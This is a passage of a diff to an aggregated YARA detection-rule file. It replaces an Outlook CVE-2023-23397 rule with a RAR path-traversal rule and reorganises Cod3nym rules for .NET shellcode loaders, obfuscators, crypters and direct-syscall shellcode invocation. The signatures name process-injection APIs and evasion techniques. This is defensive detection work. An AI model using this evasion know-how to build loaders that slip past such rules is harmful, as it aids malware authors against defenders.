-		modified = "2023-04-20"
-		reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
-		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/Outlook_CVE_2023_23397.yara#L1-L29"
-		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
-		logic_hash = "695721ec276415c6a6a0f4ce6378ff2d11c15d28271f587966bc3d9d8c06f63a"
-		score = 75
-		quality = 25
-		tags = "FILE"
-		hash1 = "52dbaf64ce1a5cd1db9a9d385f8204e5f665ca53a3d904033bf1a10369490646"
-		hash2 = "582442ee950d546744f2fa078adb005853a453e9c7f48c6c770e6322a888c2cf"
-		hash3 = "078b5023cae7bd784a84ec4ee8df305ee7825025265bf2ddc1f5238c3e432f5f"
-		hash4 = "1867bc9f81e99a55103288ce10c5c05267119ebb13757686e59bfed156f62b51"
+		tags = "CVE-2025-8088, FILE"
+		hash1 = "2a8fafa01f6d3863c87f20905736ebab28d6a5753ab708760c0b6cf3970828c3"
 
 	strings:
-		$pid_reminder_file = { 1f 85 00 00 0? 00 ?? 00 }
-		$pid_reminder_override = { 1c 85 00 00 0? 00 ?? 00 }
-		$psetid_common = { 08 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
-		$psetid_appointment = { 02 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
-		$psetid_task = { 03 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
-		$unc = /\\\\([a-z1-9][a-z0-9.]{6}|\.\\UNC\\\\)/ wide ascii
+		$ = { 00 03 53 54 4d [2-3] 3a ( 5c | 2e ) ( 5c | 2e ) ( 5c | 2e ) ( 5c | 2e ) }
 
 	condition:
-		filesize < 1MB and ( uint32be( 0 ) == 0xd0cf11e0 or uint32be( 0 ) == 0x789f3e22 ) and ( $psetid_appointment or $psetid_task ) and $psetid_common and ( $pid_reminder_file and $pid_reminder_override ) and $unc
+		uint32be( 0 ) == 0x52617221 and all of them
 }
 /*
  * YARA Rule Set
  * Repository Name: GodModeRules
  * Repository: https://github.com/Neo23x0/god-mode-rules/
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: 436dc682164cf17a123d6b09d1424e7e2acf0c25
  * Number of Rules: 1
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -176359,7 +176306,7 @@ rule GODMODERULES_IDDQD_God_Mode_Rule
 		license_url = "https://github.com/Neo23x0/god-mode-rules//blob/436dc682164cf17a123d6b09d1424e7e2acf0c25/LICENSE"
 		logic_hash = "f2996ad7090a79c470e64c9e0ac43c2ba3fc1bf18e39686ecda9dc5b89744d7e"
 		score = 60
-		quality = 1
+		quality = 26
 		tags = ""
 		importance = 60
 
@@ -176406,7 +176353,7 @@ rule GODMODERULES_IDDQD_God_Mode_Rule
  * YARA Rule Set
  * Repository Name: Cod3nym
  * Repository: https://github.com/cod3nym/detection-rules/
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: 86a04c4594cb48895192aad4af164f21f568c136
  * Number of Rules: 13
  * Skipped: 0 (age), 1 (quality), 0 (score), 0 (importance)
@@ -176454,26 +176401,106 @@ OUT OF OR IN CONNECTION WITH THE RULES OR THE USE OR OTHER DEALINGS IN THE
 RULES.
 
  */
-rule COD3NYM_Eazfuscator_String_Encryption : SUSPICIOUS OBFUSCATION FILE
+rule COD3NYM_SUSP_NET_Shellcode_Loader_Indicators_Jan24 : FILE
+{
+	meta:
+		description = "Detects indicators of shellcode loaders in .NET binaries"
+		author = "Jonathan Peters"
+		id = "606a444a-b894-5076-8d5e-1716bbfa588e"
+		date = "2024-01-11"
+		modified = "2024-01-12"
+		reference = "https://github.com/Workingdaturah/Payload-Generator/tree/main"
+		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/yara/dotnet/suspicious_indicators.yar#L1-L22"
+		license_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/LICENSE.md"
+		hash = "c48752a5b07b58596564f13301276dd5b700bd648a04af2e27d3f78512a06408"
+		logic_hash = "28267eb54a4108924df57512bbae9f47f51fd4860b3cf93c014d73b0d4b2dec2"
+		score = 65
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$sa1 = "VirtualProtect" ascii
+		$sa2 = "VirtualAlloc" ascii
+		$sa3 = "WriteProcessMemory" ascii
+		$sa4 = "CreateRemoteThread" ascii
+		$sa5 = "CreateThread" ascii
+		$sa6 = "WaitForSingleObject" ascii
+		$x = "__StaticArrayInitTypeSize=" ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and 3 of ( $sa* ) and #x == 1
+}
+rule COD3NYM_SUSP_OBF_NET_Confuserex_Name_Pattern_Jan24 : FILE
+{
+	meta:
+		description = "Detects Naming Pattern used by ConfuserEx. ConfuserEx is a widely used open source obfuscator often found in malware"
+		author = "Jonathan Peters"
+		id = "2b57f135-9d9d-5401-be29-a1053f4249ec"
+		date = "2024-01-03"
+		modified = "2024-01-09"
+		reference = "https://github.com/yck1509/ConfuserEx/tree/master"
+		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/yara/dotnet/obf_confuserex.yar#L1-L21"
+		license_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/LICENSE.md"
+		hash = "2f67f590cabb9c79257d27b578d8bf9d1a278afa96b205ad2b4704e7b9a87ca7"
+		logic_hash = "f28f3bd61c6f257cc622f6f323a5b5113d7d7b79ce8b852df02c42af22ecf033"
+		score = 50
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$s1 = "mscoree.dll" ascii
+		$s2 = "mscorlib" ascii
+		$s3 = "System.Private.Corlib" ascii
+		$s4 = "#Strings" ascii
+		$s5 = { 5F 43 6F 72 [3] 4D 61 69 6E }
+		$name_pattern = { E2 ( 80 8? | 81 AA ) E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 80 AE}
+
+	condition:
+		uint16( 0 ) == 0x5a4d and 2 of ( $s* ) and #name_pattern > 5
+}
+rule COD3NYM_SUSP_OBF_NET_Confuserex_Packer_Jan24 : FILE
+{
+	meta:
+		description = "Detects binaries packed with ConfuserEx compression packer. This feature compresses and encrypts the actual image into a stub that unpacks and loads the original image on runtime."
+		author = "Jonathan Peters"
+		id = "cd53a62f-62e3-58a1-8bc3-7f40949e3f00"
+		date = "2024-01-09"
+		modified = "2024-01-09"
+		reference = "https://github.com/yck1509/ConfuserEx/tree/master"
+		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/yara/dotnet/obf_confuserex.yar#L23-L42"
+		license_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/LICENSE.md"
+		hash = "2570bd4c3f564a61d6b3d589126e0940af27715e1e8d95de7863579fbe25f86f"
+		logic_hash = "43aee4c01b47ca04ee516d418939ec3e90fd08566f2a4b501c4698b7f9e0225d"
+		score = 70
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$s1 = "GCHandle" ascii
+		$s2 = "GCHandleType" ascii
+		$op1 = { 5A 20 89 C0 3F 14 6A 5E [8-20] 5A 20 FB 56 4D 44 6A 5E 6D 9E }
+		$op2 = { 20 61 FF 6F 00 13 ?? 06 13 ?? 16 13 [10-20] 20 1F 3F 5E 00 5A}
+		$op3 = { 16 91 7E [3] 04 17 91 1E 62 60 7E [3] 04 18 91 1F 10 62 60 7E [3] 04 19 91 1F 18 62 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and all of ( $s* ) and 2 of ( $op* )
+}
+rule COD3NYM_SUSP_OBF_NET_Eazfuscator_String_Encryption_Jan24 : FILE
 {
 	meta:
-		description = "Eazfuscator.NET string encryption"
+		description = "Detects .NET images obfuscated with Eazfuscator string encryption. Eazfuscator is a widely used commercial obfuscation solution used by both legitimate software and malware."
 		author = "Jonathan Peters"
 		id = "09a400f5-e837-58c2-9b51-9213c8ab0883"
 		date = "2024-01-01"
-		modified = "2024-01-10"
-		reference = "https://github.com/cod3nym/detection-rules/"
-		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/malcat/obfuscators.yar#L1-L29"
+		modified = "2024-01-03"
+		reference = "https://www.gapotchenko.com/eazfuscator.net"
+		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/yara/dotnet/obf_eazfuscator.yar#L1-L28"
 		license_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/LICENSE.md"
 		hash = "3a9ee09ed965e3aee677043ba42c7fdbece0150ef9d1382c518b4b96bbd0e442"
 		logic_hash = "5f3f3358e3cfb274aa2e8465dde58a080f9fb282aa519885b9d39429521db6d9"
-		score = 65
+		score = 50
 		quality = 80
-		tags = "SUSPICIOUS, OBFUSCATION, FILE"
-		name = "Eazfuscator"
-		category = "obfuscation"
-		reliability = 90
-		tlp = "TLP:white"
+		tags = "FILE"
 
 	strings:
 		$sa1 = "StackFrame" ascii
@@ -176488,26 +176515,22 @@ rule COD3NYM_Eazfuscator_String_Encryption : SUSPICIOUS OBFUSCATION FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and all of ( $sa* ) and ( 2 of ( $op* ) or #op1 == 2 )
 }
-rule COD3NYM_Eazfuscator_Code_Virtualization : SUSPICIOUS OBFUSCATION FILE
+rule COD3NYM_SUSP_OBF_NET_Eazfuscator_Virtualization_Jan24 : FILE
 {
 	meta:
-		description = "Eazfuscator.NET code virtualization"
+		description = "Detects .NET images obfuscated with Eazfuscator virtualization protection. Eazfuscator is a widely used commercial obfuscation solution used by both legitimate software and malware."
 		author = "Jonathan Peters"
 		id = "d39bba65-1220-5b60-b919-1bd88f1bc7f1"
-		date = "2024-01-01"
-		modified = "2024-01-10"
-		reference = "https://github.com/cod3nym/detection-rules/"
-		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/malcat/obfuscators.yar#L31-L54"
+		date = "2024-01-02"
+		modified = "2024-01-03"
+		reference = "https://www.gapotchenko.com/eazfuscator.net"
+		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/yara/dotnet/obf_eazfuscator.yar#L30-L51"
 		license_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/LICENSE.md"
 		hash = "53d5c2574c7f70b7aa69243916acf6e43fe4258fbd015660032784e150b3b4fa"
 		logic_hash = "7a647973eae9163cb5b82c27141956da58f4a9fd2ad51cf82523b93536cfaea3"
-		score = 65
+		score = 60
 		quality = 80
-		tags = "SUSPICIOUS, OBFUSCATION, FILE"
-		name = "Eazfuscator"
-		category = "obfuscation"
-		reliability = 90
-		tlp = "TLP:white"
+		tags = "FILE"
 
 	strings:
 		$sa1 = "BinaryReader" ascii
@@ -176520,83 +176543,46 @@ rule COD3NYM_Eazfuscator_Code_Virtualization : SUSPICIOUS OBFUSCATION FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and all of ( $sa* ) and 2 of ( $op* )
 }
-rule COD3NYM_Confuserex_Naming_Pattern : SUSPICIOUS OBFUSCATION FILE
-{
-	meta:
-		description = "ConfuserEx Renaming Pattern"
-		author = "Jonathan Peters"
-		id = "2b57f135-9d9d-5401-be29-a1053f4249ec"
-		date = "2024-01-03"
-		modified = "2024-01-10"
-		reference = "https://github.com/cod3nym/detection-rules/"
-		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/malcat/obfuscators.yar#L56-L77"
-		license_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/LICENSE.md"
-		logic_hash = "f28f3bd61c6f257cc622f6f323a5b5113d7d7b79ce8b852df02c42af22ecf033"
-		score = 65
-		quality = 80
-		tags = "SUSPICIOUS, OBFUSCATION, FILE"
-		name = "ConfuserEx"
-		category = "obfuscation"
-		reliability = 90
-
-	strings:
-		$s1 = "mscoree.dll" ascii
-		$s2 = "mscorlib" ascii
-		$s3 = "System.Private.Corlib" ascii
-		$s4 = "#Strings" ascii
-		$s5 = { 5F 43 6F 72 [3] 4D 61 69 6E }
-		$name_pattern = { E2 ( 80 8? | 81 AA ) E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 80 AE}
 
-	condition:
-		uint16( 0 ) == 0x5a4d and 2 of ( $s* ) and #name_pattern > 5
-}
-rule COD3NYM_Confuserex_Packer : SUSPICIOUS OBFUSCATION FILE
+rule COD3NYM_SUSP_OBF_NET_Reactor_Native_Stub_Jan24
 {
 	meta:
-		description = "ConfuserEx Packer"
+		description = "Detects native packer stub for version 4.5-4.7 of .NET Reactor. A pirated copy of version 4.5 of this commercial obfuscation solution is used by various malware families like BlackBit, RedLine, AgentTesla etc."
 		author = "Jonathan Peters"
-		id = "cd53a62f-62e3-58a1-8bc3-7f40949e3f00"
-		date = "2024-01-09"
-		modified = "2024-01-10"
-		reference = "https://github.com/cod3nym/detection-rules/"
-		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/malcat/obfuscators.yar#L79-L99"
+		id = "529dce88-a81d-5a98-aa6c-1f1b739ad074"
+		date = "2024-01-05"
+		modified = "2024-01-12"
+		reference = "https://notes.netbytesec.com/2023/08/understand-ransomware-ttps-blackbit.html"
+		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/yara/dotnet/obf_net_reactor.yar#L3-L16"
 		license_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/LICENSE.md"
-		logic_hash = "43aee4c01b47ca04ee516d418939ec3e90fd08566f2a4b501c4698b7f9e0225d"
-		score = 65
+		hash = "6e8a7adf680bede7b8429a18815c232004057607fdfbf0f4b0fb1deba71c5df7"
+		logic_hash = "287273babd3cd6bc1986b018367317019f2249851a2c19fc83857f7ff0b90b54"
+		score = 70
 		quality = 80
-		tags = "SUSPICIOUS, OBFUSCATION, FILE"
-		name = "ConfuserEx"
-		category = "obfuscation"
-		reliability = 90
+		tags = ""
 
 	strings:
-		$s1 = "GCHandle" ascii
-		$s2 = "GCHandleType" ascii
-		$op1 = { 5A 20 89 C0 3F 14 6A 5E [8-20] 5A 20 FB 56 4D 44 6A 5E 6D 9E }
-		$op2 = { 20 61 FF 6F 00 13 ?? 06 13 ?? 16 13 [10-20] 20 1F 3F 5E 00 5A }
-		$op3 = { 16 91 7E [3] 04 17 91 1E 62 60 7E [3] 04 18 91 1F 10 62 60 7E [3] 04 19 91 1F 18 62 }
+		$op = {C6 44 24 18 E0 C6 44 24 19 3B C6 44 24 1A 8D C6 44 24 1B 2A C6 44 24 1C A2 C6 44 24 1D 2A C6 44 24 1E 2A C6 44 24 1F 41 C6 44 24 20 D3 C6 44 24 21 20 C6 44 24 22 64 C6 44 24 23 06 C6 44 24 24 8A C6 44 24 25 F7 C6 44 24 26 3D C6 44 24 27 9D C6 44 24 28 D9 C6 44 24 29 EE C6 44 24 2A 15 C6 44 24 2B 68 C6 44 24 2C F4 C6 44 24 2D 76 C6 44 24 2E B9 C6 44 24 2F 34 C6 44 24 30 BF C6 44 24 31 1E C6 44 24 32 E7 C6 44 24 33 78 C6 44 24 34 98 C6 44 24 35 E9 C6 44 24 36 6F C6 44 24 37 B4}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* ) and 2 of ( $op* )
+		for any i in ( 0 .. pe.number_of_resources -1 ) : ( pe.resources [ i ] . name_string == "_\x00_\x00" ) and $op
 }
-rule COD3NYM_Reactor_Indicators : SUSPICIOUS OBFUSCATION FILE
+rule COD3NYM_SUSP_OBF_NET_Reactor_Indicators_Jan24 : FILE
 {
 	meta:
-		description = "Ezriz .NET Reactor obfuscator"
+		description = "Detects indicators of .NET Reactors managed obfuscation. Reactor is a commercial obfuscation solution, pirated versions are often abused by threat actors."
 		author = "Jonathan Peters"
 		id = "8dc07bbd-cbeb-5214-a27a-555a0d396197"
 		date = "2024-01-09"
-		modified = "2024-01-10"
-		reference = "https://github.com/cod3nym/detection-rules/"
-		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/malcat/obfuscators.yar#L103-L119"
+		modified = "2024-01-12"
+		reference = "https://www.eziriz.com/dotnet_reactor.htm"
+		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/yara/dotnet/obf_net_reactor.yar#L18-L34"
 		license_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/LICENSE.md"
+		hash = "be842a9de19cfbf42ea5a94e3143d58390a1abd1e72ebfec5deeb8107dddf038"
 		logic_hash = "40a03eb487e2c02a032c4bfb51580dbb764e0a49ceee5ae92c54a5ee3ede9696"
 		score = 65
 		quality = 80
-		tags = "SUSPICIOUS, OBFUSCATION, FILE"
-		name = ".NET Reactor"
-		category = "obfuscation"
-		reliability = 90
+		tags = "FILE"
 
 	strings:
 		$ = { 33 7B 00 [9] 00 2D 00 [9] 00 2D 00 [9] 00 2D 00 [9] 00 7D 00 }
@@ -176607,24 +176593,21 @@ rule COD3NYM_Reactor_Indicators : SUSPICIOUS OBFUSCATION FILE
 		uint16( 0 ) == 0x5a4d and 2 of them
 }
 
-rule COD3NYM_Singlefilehost_App_Bundle : COMPILER FILE
+rule COD3NYM_DOTNET_Singlefilehost_Bundled_App : FILE
 {
 	meta:
-		description = "DotNet singlefilehost app bundle"
+		description = "Detects single file host .NET bundled apps."
 		author = "Jonathan Peters"
 		id = "061bd294-58d6-57be-b8b5-b8a8f31ce316"
-		date = "2024-01-03"
-		modified = "2025-07-01"
-		reference = "https://github.com/cod3nym/detection-rules/"
-		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/malcat/other.yar#L3-L21"
+		date = "2024-01-02"
+		modified = "2024-01-05"
+		reference = "https://learn.microsoft.com/en-us/dotnet/core/deploying/single-file"
+		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/yara/dotnet/framework_identiciation.yar#L3-L17"
 		license_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/LICENSE.md"
 		logic_hash = "12075b07a9feb951898ac8eba303471d9253ed9535db927244e5562f4fad33d6"
-		score = 40
+		score = 75
 		quality = 80
-		tags = "COMPILER, FILE"
-		name = "DotNet"
-		category = "compiler"
-		reliability = 90
+		tags = "FILE"
 
 	strings:
 		$ = "singlefilehost.exe" ascii
@@ -176633,6 +176616,63 @@ rule COD3NYM_Singlefilehost_App_Bundle : COMPILER FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and 1 of them and pe.exports ( "DotNetRuntimeInfo" ) and pe.exports ( "CLRJitAttachState" )
 }
+rule COD3NYM_MAL_NET_Limecrypter_Runpe_Jan24 : FILE
+{
+	meta:
+		description = "Detects LimeCrypter RunPE module. LimeCrypter is an open source .NET based crypter and loader commonly used by threat actors"
+		author = "Jonathan Peters"
+		id = "06ecd638-0102-5762-b363-fdc390dda04b"
+		date = "2024-01-16"
+		modified = "2024-01-16"
+		reference = "https://github.com/NYAN-x-CAT/Lime-Crypter/tree/master"
+		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/yara/dotnet/mal/mal_net_limecrypter_runpe.yar#L1-L22"
+		license_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/LICENSE.md"
+		hash = "bcc8c679acfc3aabf22ebdb2349b1fabd351a89fd23a716d85154049d352dd12"
+		logic_hash = "b01a68c60d62cf94ef16340316acb9b96d1e671c372559b86a8e6a5d8e80f7d9"
+		score = 80
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$op1 = { 1F 1A 58 1F 1A 58 28 }
+		$op2 = { 20 B3 00 00 00 8D ?? 00 00 01 13 ?? 11 ?? 16 20 02 00 01 00 }
+		$op3 = { 11 0? 11 0? 20 00 30 00 00 1F 40 28 ?? 00 00 06 }
+		$op4 = { 6E 20 FF 7F 00 00 6A FE 02 }
+		$s1 = "RawSecurityDescriptor" ascii
+		$s2 = "CommonAce" ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and all of ( $s* ) and 2 of ( $op* )
+}
+rule COD3NYM_MAL_NET_Niximports_Loader_Jan24 : FILE
+{
+	meta:
+		description = "Detects open-source NixImports .NET malware loader. A stealthy loader using dynamic import resolving to evade static detection"
+		author = "Jonathan Peters"
+		id = "f36ad127-4c4b-5b7e-a13c-bfb9d222a438"
+		date = "2024-01-12"
+		modified = "2024-01-12"
+		reference = "https://github.com/dr4k0nia/NixImports/tree/master"
+		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/yara/dotnet/mal/mal_net_niximports_loader.yar#L1-L22"
+		license_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/LICENSE.md"
+		hash = "dd3f22871879b0bc4990c96d1de957848c7ed0714635bb036c73d8a989fb0b39"
+		logic_hash = "e41d7f4cb46aa0baa87d3024e0550efe5058ca49d908bbd34197431c7c054e58"
+		score = 80
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$op1 = { 1F 0A 64 06 1F 11 62 60 }
+		$op2 = { 03 20 4D 5A 90 00 94 4B 2A }
+		$op3 = { 20 DE 7A 1F F3 20 F7 1B 18 BC }
+		$op4 = { 20 CE 1F BE 70 20 DF 1F 3E F8 14 }
+		$sa1 = "OffsetToStringData" ascii
+		$sa2 = "GetRuntimeMethods" ascii
+		$sa3 = "netstandard" ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and all of ( $sa* ) and 2 of ( $op* )
+}
 rule COD3NYM_SUSP_OBF_Pyarmor_Jan24
 {
 	meta:
@@ -176660,6 +176700,29 @@ rule COD3NYM_SUSP_OBF_Pyarmor_Jan24
 	condition:
 		2 of them
 }
+rule COD3NYM_SUSP_Direct_Syscall_Shellcode_Invocation_Jan24 : FILE
+{
+	meta:
+		description = "Detects direct syscall evasion technqiue using NtProtectVirtualMemory to invoke shellcode"
+		author = "Jonathan Peters"
+		id = "2a0ce887-299d-5aad-bed3-3e698b4dea79"
+		date = "2024-01-14"
+		modified = "2024-01-14"
+		reference = "https://unprotect.it/technique/evasion-using-direct-syscalls/"
+		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/yara/other/susp_direct_syscall_shellcode_invocation.yar#L1-L14"
+		license_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/LICENSE.md"
+		hash = "f7cd214e7460c539d6f8d02b6650098e3983862ff658b76ea02c33f5a45fc836"
+		logic_hash = "b5b0ad86289a4e2af7cdc909192f4dc9325c1763259f40adcc1e60c088c9e4f3"
+		score = 65
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { B8 40 00 00 00 67 4C 8D 08 49 89 CA 48 C7 C0 50 00 00 00 0F 05 [4-8] 4C 8D 3D 02 00 00 00 FF E0 }
+
+	condition:
+		all of them and filesize < 2MB
+}
 rule COD3NYM_SUSP_RLO_Exe_Extension_Spoofing_Jan24
 {
 	meta:
@@ -176726,144 +176789,11 @@ rule COD3NYM_SUSP_RLO_Exe_Extension_Spoofing_Jan24
 	condition:
 		1 of them
 }
-rule COD3NYM_SUSP_Direct_Syscall_Shellcode_Invocation_Jan24 : FILE
-{
-	meta:
-		description = "Detects direct syscall evasion technqiue using NtProtectVirtualMemory to invoke shellcode"
-		author = "Jonathan Peters"
-		id = "2a0ce887-299d-5aad-bed3-3e698b4dea79"
-		date = "2024-01-14"
-		modified = "2024-01-14"
-		reference = "https://unprotect.it/technique/evasion-using-direct-syscalls/"
-		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/yara/other/susp_direct_syscall_shellcode_invocation.yar#L1-L14"
-		license_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/LICENSE.md"
-		hash = "f7cd214e7460c539d6f8d02b6650098e3983862ff658b76ea02c33f5a45fc836"
-		logic_hash = "b5b0ad86289a4e2af7cdc909192f4dc9325c1763259f40adcc1e60c088c9e4f3"
-		score = 65
-		quality = 80
-		tags = "FILE"
-
-	strings:
-		$ = { B8 40 00 00 00 67 4C 8D 08 49 89 CA 48 C7 C0 50 00 00 00 0F 05 [4-8] 4C 8D 3D 02 00 00 00 FF E0 }
-
-	condition:
-		all of them and filesize < 2MB
-}
-
-rule COD3NYM_SUSP_OBF_NET_Reactor_Native_Stub_Jan24
-{
-	meta:
-		description = "Detects native packer stub for version 4.5-4.7 of .NET Reactor. A pirated copy of version 4.5 of this commercial obfuscation solution is used by various malware families like BlackBit, RedLine, AgentTesla etc."
-		author = "Jonathan Peters"
-		id = "529dce88-a81d-5a98-aa6c-1f1b739ad074"
-		date = "2024-01-05"
-		modified = "2024-01-12"
-		reference = "https://notes.netbytesec.com/2023/08/understand-ransomware-ttps-blackbit.html"
-		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/yara/dotnet/obf_net_reactor.yar#L3-L16"
-		license_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/LICENSE.md"
-		hash = "6e8a7adf680bede7b8429a18815c232004057607fdfbf0f4b0fb1deba71c5df7"
-		logic_hash = "287273babd3cd6bc1986b018367317019f2249851a2c19fc83857f7ff0b90b54"
-		score = 70
-		quality = 80
-		tags = ""
-
-	strings:
-		$op = {C6 44 24 18 E0 C6 44 24 19 3B C6 44 24 1A 8D C6 44 24 1B 2A C6 44 24 1C A2 C6 44 24 1D 2A C6 44 24 1E 2A C6 44 24 1F 41 C6 44 24 20 D3 C6 44 24 21 20 C6 44 24 22 64 C6 44 24 23 06 C6 44 24 24 8A C6 44 24 25 F7 C6 44 24 26 3D C6 44 24 27 9D C6 44 24 28 D9 C6 44 24 29 EE C6 44 24 2A 15 C6 44 24 2B 68 C6 44 24 2C F4 C6 44 24 2D 76 C6 44 24 2E B9 C6 44 24 2F 34 C6 44 24 30 BF C6 44 24 31 1E C6 44 24 32 E7 C6 44 24 33 78 C6 44 24 34 98 C6 44 24 35 E9 C6 44 24 36 6F C6 44 24 37 B4}
-
-	condition:
-		for any i in ( 0 .. pe.number_of_resources -1 ) : ( pe.resources [ i ] . name_string == "_\x00_\x00" ) and $op
-}
-rule COD3NYM_SUSP_NET_Shellcode_Loader_Indicators_Jan24 : FILE
-{
-	meta:
-		description = "Detects indicators of shellcode loaders in .NET binaries"
-		author = "Jonathan Peters"
-		id = "606a444a-b894-5076-8d5e-1716bbfa588e"
-		date = "2024-01-11"
-		modified = "2024-01-12"
-		reference = "https://github.com/Workingdaturah/Payload-Generator/tree/main"
-		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/yara/dotnet/suspicious_indicators.yar#L1-L22"
-		license_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/LICENSE.md"
-		hash = "c48752a5b07b58596564f13301276dd5b700bd648a04af2e27d3f78512a06408"
-		logic_hash = "28267eb54a4108924df57512bbae9f47f51fd4860b3cf93c014d73b0d4b2dec2"
-		score = 65
-		quality = 80
-		tags = "FILE"
-
-	strings:
-		$sa1 = "VirtualProtect" ascii
-		$sa2 = "VirtualAlloc" ascii
-		$sa3 = "WriteProcessMemory" ascii
-		$sa4 = "CreateRemoteThread" ascii
-		$sa5 = "CreateThread" ascii
-		$sa6 = "WaitForSingleObject" ascii
-		$x = "__StaticArrayInitTypeSize=" ascii
-
-	condition:
-		uint16( 0 ) == 0x5a4d and 3 of ( $sa* ) and #x == 1
-}
-rule COD3NYM_MAL_NET_Limecrypter_Runpe_Jan24 : FILE
-{
-	meta:
-		description = "Detects LimeCrypter RunPE module. LimeCrypter is an open source .NET based crypter and loader commonly used by threat actors"
-		author = "Jonathan Peters"
-		id = "06ecd638-0102-5762-b363-fdc390dda04b"
-		date = "2024-01-16"
-		modified = "2024-01-16"
-		reference = "https://github.com/NYAN-x-CAT/Lime-Crypter/tree/master"
-		source_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/yara/dotnet/mal/mal_net_limecrypter_runpe.yar#L1-L22"
-		license_url = "https://github.com/cod3nym/detection-rules//blob/86a04c4594cb48895192aad4af164f21f568c136/LICENSE.md"
